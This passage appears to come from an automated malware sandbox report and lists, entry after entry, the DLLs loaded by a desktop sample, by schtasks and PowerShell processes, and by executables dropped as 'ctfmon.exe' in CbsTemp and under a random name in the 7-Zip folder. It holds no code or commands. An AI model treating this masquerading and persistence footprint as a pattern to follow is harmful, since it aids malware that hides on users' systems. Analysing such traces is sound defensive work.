Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: mscoree.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: apphelp.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: version.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: uxtheme.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: windows.storage.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: wldp.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: profapi.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: cryptsp.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: rsaenh.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: cryptbase.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: sspicli.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: mscoree.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: version.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: uxtheme.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: windows.storage.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: wldp.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: profapi.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: cryptsp.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: rsaenh.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: cryptbase.dll
Source: C:\Windows\CbsTemp\ctfmon.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: version.dll
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Section loaded: vcruntime140_clr0400.dll
